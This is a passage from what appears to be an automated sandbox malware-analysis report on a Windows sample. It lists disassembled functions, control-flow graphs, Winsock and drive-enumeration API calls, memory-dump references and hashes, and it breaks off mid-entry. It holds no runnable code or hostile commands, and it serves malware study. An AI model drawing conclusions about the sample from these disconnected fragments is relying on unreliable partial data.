                                                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 008B935D
                                                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 008B9388
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: Ioctlsetsockopt
                                                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                                • API String ID: 1903391676-2691795271
                                                                • Opcode ID: ae5e8a5e49c39cc3cb48bedb7174e49bb167bdd5b48378ea91c7d9213d24f578
                                                                • Instruction ID: 771fa659f1b0147e554ee04d94b5a8f8aadb9cf5361748f29dd5124f506336b4
                                                                • Opcode Fuzzy Hash: ae5e8a5e49c39cc3cb48bedb7174e49bb167bdd5b48378ea91c7d9213d24f578
                                                                • Instruction Fuzzy Hash: 2751B170604305ABDB11DF24C881FAAB7A5FF88314F148529FE98DB392E731E995C791
                                                                Function 008876A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1552 8876a0-8876be 1553 8876c0-8876c7 1552->1553 1554 8876e6-8876f2 send 1552->1554 1553->1554 1557 8876c9-8876d1 1553->1557 1555 88775e-887762 1554->1555 1556 8876f4-887709 call 8872a0 1554->1556 1556->1555 1558 88770b-887759 call 8872a0 call 88cb20 call c08c50 1557->1558 1559 8876d3-8876e4 1557->1559 1558->1555 1559->1556
                                                                APIs
                                                                • send.WS2_32(multi.c,?,?,?,00883D4E,00000000,?,?,008907BF), ref: 008876EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: send
                                                                • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                                • API String ID: 2809346765-3388739168
                                                                • Opcode ID: 3bbac19d3e565aab0f26f55048bb38ee065afd4c91a0a2142d3c772219a163da
                                                                • Instruction ID: e58ecc0a8411c82e6cd1f77b11074ac628cee13e569a340b03d3b6a71906ba4b
                                                                • Opcode Fuzzy Hash: 3bbac19d3e565aab0f26f55048bb38ee065afd4c91a0a2142d3c772219a163da
                                                                • Instruction Fuzzy Hash: 6B113DB1518344BFE520B7559C46D277BACEFC5B68F651518F808B3252E1A1DC04C3B2
                                                                Function 00887770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1671 887770-88778e 1672 887790-887797 1671->1672 1673 8877b6-8877c2 recv 1671->1673 1672->1673 1674 887799-8877a1 1672->1674 1675 88782e-887832 1673->1675 1676 8877c4-8877d9 call 8872a0 1673->1676 1677 8877db-887829 call 8872a0 call 88cb20 call c08c50 1674->1677 1678 8877a3-8877b4 1674->1678 1676->1675 1677->1675 1678->1676
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: recv
                                                                • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                                • API String ID: 1507349165-640788491
                                                                • Opcode ID: 78123af096f42387dfccbb5b3ca2b839370d98e5a50273a25ae65a98eb589364
                                                                • Instruction ID: 5fc18a42bd912ee637b6c1a43c8de3f746bb57b34c57bae761f6d8393af03b70
                                                                • Opcode Fuzzy Hash: 78123af096f42387dfccbb5b3ca2b839370d98e5a50273a25ae65a98eb589364
                                                                • Instruction Fuzzy Hash: 48112BB4519344BFE120B7159C4AD277BACEBC6B68F650528F808B2252D561DC04C7B2
                                                                Function 008875E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1690 8875e0-8875ed 1691 8875ef-8875f6 1690->1691 1692 887607-887629 socket 1690->1692 1691->1692 1693 8875f8-8875ff 1691->1693 1694 88762b-88763c call 8872a0 1692->1694 1695 88763f-887642 1692->1695 1696 887601-887602 1693->1696 1697 887643-887699 call 8872a0 call 88cb20 call c08c50 1693->1697 1694->1695 1696->1692
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                                • API String ID: 98920635-842387772
                                                                • Opcode ID: 4181ed3363b1b5bd0034791b1e6abf50b8972268554c950624d679d3e9385268
                                                                • Instruction ID: b8a5ba0b5a2c5e97d1deb8dfd71a8f2582e52a2441c172484403e4c5696cc60d
                                                                • Opcode Fuzzy Hash: 4181ed3363b1b5bd0034791b1e6abf50b8972268554c950624d679d3e9385268
                                                                • Instruction Fuzzy Hash: 0F118C71A10651AFD620676D6C06E5B3BA8EF91734F550510F414F22D2E352C858C3E1
                                                                Function 06FB0BB4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1799 6fb0bb4-6fb0c03 call 6fb0c05 1804 6fb0c30-6fb0cd1 call 6fb0cd2 1799->1804 1805 6fb0c05-6fb0c2f 1799->1805 1816 6fb0d2b-6fb0d32 1804->1816 1817 6fb0cd3-6fb0ceb GetLogicalDrives 1804->1817 1805->1804 1818 6fb0cf9-6fb0d29 call 6fb0d33 1817->1818 1818->1816
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\$k`aa
                                                                • API String ID: 999431828-564663876
                                                                • Opcode ID: 8ec41cd8fe84f46bf94c5c31cb214521bbe693e8d59f6f8e07b84800d5ce366d
                                                                • Instruction ID: fd454db43be4e6dff502670a06346d3da371f3be7a06f901a371c67dabb44a8e
                                                                • Opcode Fuzzy Hash: 8ec41cd8fe84f46bf94c5c31cb214521bbe693e8d59f6f8e07b84800d5ce366d
                                                                • Instruction Fuzzy Hash: B02108E710C1007DF381D5936B50BFB7BAEE6C6330731D866F407C6202DB950A4A51B1
                                                                Function 008BA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1823 8ba150-8ba159 1824 8ba15f-8ba17b 1823->1824 1825 8ba250 1823->1825 1826 8ba249-8ba24f 1824->1826 1827 8ba181-8ba1ce getsockname 1824->1827 1826->1825 1828 8ba1d0-8ba1f5 call 89d090 1827->1828 1829 8ba1f7-8ba214 call 8bef30 1827->1829 1836 8ba240-8ba246 call 8c4f40 1828->1836 1829->1826 1834 8ba216-8ba23b call 89d090 1829->1834 1834->1836 1836->1826
                                                                APIs
                                                                • getsockname.WS2_32(?,?,00000080), ref: 008BA1C6
                                                                Strings
                                                                • getsockname() failed with errno %d: %s, xrefs: 008BA1F0
                                                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 008BA23B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: getsockname
                                                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                                • API String ID: 3358416759-2605427207
                                                                • Opcode ID: 96b97f9678245148ba37a2dd405b057c795fc34aa24a219011dbc3a69c22d510
                                                                • Instruction ID: 42b137dfb7832aea34dc4828f302f2fb70a7808f9e2a8a9c5a15d25ecda60111
                                                                • Opcode Fuzzy Hash: 96b97f9678245148ba37a2dd405b057c795fc34aa24a219011dbc3a69c22d510
                                                                • Instruction Fuzzy Hash: DB21DB31848780BAFB259728DC42FE673BCEF81324F040655F99893151FF32698586E3
                                                                Function 0089D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1843 89d5e0-89d5ee 1844 89d5f0-89d604 call 89d690 1843->1844 1845 89d652-89d662 WSAStartup 1843->1845 1851 89d61b-89d651 call 8a7620 1844->1851 1852 89d606-89d614 1844->1852 1846 89d670-89d676 1845->1846 1847 89d664-89d66f 1845->1847 1846->1844 1849 89d67c-89d68d 1846->1849 1852->1851 1857 89d616 1852->1857 1857->1851
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202), ref: 0089D65B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID: if_nametoindex$iphlpapi.dll
                                                                • API String ID: 724789610-3097795196
                                                                • Opcode ID: 63ea14037c31a21ddc561de4a23d155ba20384ba28ec1e1a140b300621d5c485
                                                                • Instruction ID: d64f9fc1eb52a7d414056ae2baf5c704880ca155934a16b057bfa0592c67c786
                                                                • Opcode Fuzzy Hash: 63ea14037c31a21ddc561de4a23d155ba20384ba28ec1e1a140b300621d5c485
                                                                • Instruction Fuzzy Hash: F901A2A0E403415FFB527B389E173662690ABA2304F8D1978D988E51D3F66DC99CC3E3
                                                                Function 0094AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1859 94aa30-94aa64 1861 94ab04-94ab09 1859->1861 1862 94aa6a-94aaa7 call 93e730 1859->1862 1864 94ae80-94ae89 1861->1864 1866 94ab0e-94ab13 1862->1866 1867 94aaa9-94aabd 1862->1867 1870 94ae2e 1866->1870 1868 94aabf-94aac7 1867->1868 1869 94ab18-94ab50 1867->1869 1868->1870 1872 94aacd-94ab02 1868->1872 1875 94ab58-94ab6d 1869->1875 1871 94ae30-94ae4a call 93ea60 call 93ebf0 1870->1871 1884 94ae75-94ae7d 1871->1884 1885 94ae4c-94ae57 1871->1885 1872->1875 1878 94ab96-94abab socket 1875->1878 1879 94ab6f-94ab73 1875->1879 1878->1870 1883 94abb1-94abc5 1878->1883 1879->1878 1881 94ab75-94ab8f 1879->1881 1881->1883 1897 94ab91 1881->1897 1886 94abc7-94abca 1883->1886 1887 94abd0-94abed ioctlsocket 1883->1887 1884->1864 1889 94ae6e-94ae6f 1885->1889 1890 94ae59-94ae5e 1885->1890 1886->1887 1891 94ad2e-94ad39 1886->1891 1892 94ac10-94ac14 1887->1892 1893 94abef-94ac0a 1887->1893 1889->1884 1890->1889 1900 94ae60-94ae6c 1890->1900 1898 94ad52-94ad56 1891->1898 1899 94ad3b-94ad4c 1891->1899 1894 94ac16-94ac31 1892->1894 1895 94ac37-94ac41 1892->1895 1893->1892 1904 94ae29 1893->1904 1894->1895 1894->1904 1901 94ac43-94ac46 1895->1901 1902 94ac7a-94ac7e 1895->1902 1897->1870 1903 94ad5c-94ad6b 1898->1903 1898->1904 1899->1898 1899->1904 1900->1884 1907 94ad04-94ad08 1901->1907 1908 94ac4c-94ac51 1901->1908 1910 94ace7-94acfe 1902->1910 1911 94ac80-94ac9b 1902->1911 1912 94ad70-94ad78 1903->1912 1904->1870 1907->1891 1914 94ad0a-94ad28 1907->1914 1908->1907 1915 94ac57-94ac78 1908->1915 1910->1907 1911->1910 1916 94ac9d-94acc1 1911->1916 1917 94ada0-94adae connect 1912->1917 1918 94ad7a-94ad7f 1912->1918 1914->1891 1914->1904 1920 94acc6-94acd7 1915->1920 1916->1920 1919 94adb3-94adcf 1917->1919 1918->1917 1921 94ad81-94ad99 1918->1921 1927 94add5-94add8 1919->1927 1928 94ae8a-94ae91 1919->1928 1920->1904 1929 94acdd-94ace5 1920->1929 1921->1919 1930 94ade1-94adf1 1927->1930 1931 94adda-94addf 1927->1931 1928->1871 1929->1907 1929->1910 1932 94adf3-94ae07 1930->1932 1933 94ae0d-94ae12 1930->1933 1931->1912 1931->1930 1932->1933 1938 94aea8-94aead 1932->1938 1934 94ae14-94ae17 1933->1934 1935 94ae1a-94ae1c call 94af70 1933->1935 1934->1935 1939 94ae21-94ae23 1935->1939 1938->1871 1940 94ae25-94ae27 1939->1940 1941 94ae93-94ae9d 1939->1941 1940->1871 1942 94aeaf-94aeb1 call 93e760 1941->1942 1943 94ae9f-94aea6 call 93e7c0 1941->1943 1947 94aeb6-94aebe 1942->1947 1943->1947 1948 94aec0-94aedb call 93e180 1947->1948 1949 94af1a-94af1f 1947->1949 1948->1871 1952 94aee1-94aeec 1948->1952 1949->1871 1953 94af02-94af06 1952->1953 1954 94aeee-94aeff 1952->1954 1955 94af0e-94af15 1953->1955 1956 94af08-94af0b 1953->1956 1954->1953 1955->1864 1956->1955
                                                                APIs
                                                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0094AB9B
                                                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0094ABE3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: ioctlsocketsocket
                                                                • String ID:
                                                                • API String ID: 416004797-0
                                                                • Opcode ID: c87f868584a929c2e1e8b7efeaeae729b6f7569dac628e22653668d7c3bc3237
                                                                • Instruction ID: 617d15fa12455d84c625e349464c40aac09b0177569d85224b125ed97a8a97a9
                                                                • Opcode Fuzzy Hash: c87f868584a929c2e1e8b7efeaeae729b6f7569dac628e22653668d7c3bc3237
                                                                • Instruction Fuzzy Hash: 1CE1D0706443029FEB20CF24C885F6BB7E9EF89314F144A2CF9998B291E775D944CB92
                                                                Function 06FB0BE7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06FB0CDA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 1b4360953581f7dd1a45d0c2f0d3157f7be5312af954884e484645129423d613
                                                                • Instruction ID: 5dee809489bf3b4a0542e0b6c60a3a718c87308fc378f935e00700db91f07428
                                                                • Opcode Fuzzy Hash: 1b4360953581f7dd1a45d0c2f0d3157f7be5312af954884e484645129423d613
                                                                • Instruction Fuzzy Hash: 3B2135E300C1107DF782C6926B50AF77FAED6C7330730A466F047D6502DF940A0A9171
                                                                Function 06FB0B91 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 1728c0bbf8a2cefc3f83e5087ee4efed4dd175e0529f1ab872debc0de269c79c
                                                                • Instruction ID: 226736a8dce5c7c685cb93c25baf1fb438a957838d93e60150a8b20e5ee31761
                                                                • Opcode Fuzzy Hash: 1728c0bbf8a2cefc3f83e5087ee4efed4dd175e0529f1ab872debc0de269c79c
                                                                • Instruction Fuzzy Hash: 0F21D5E710C1007DB782D5936B54BFB7BAEEAC6330731E466F007D6602DF950A4A92B2
                                                                Function 06FB0BCE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 53f73658a245f5cc4307995f3f7297fce21d2d0a4260d285bcf569828ce7bdc7
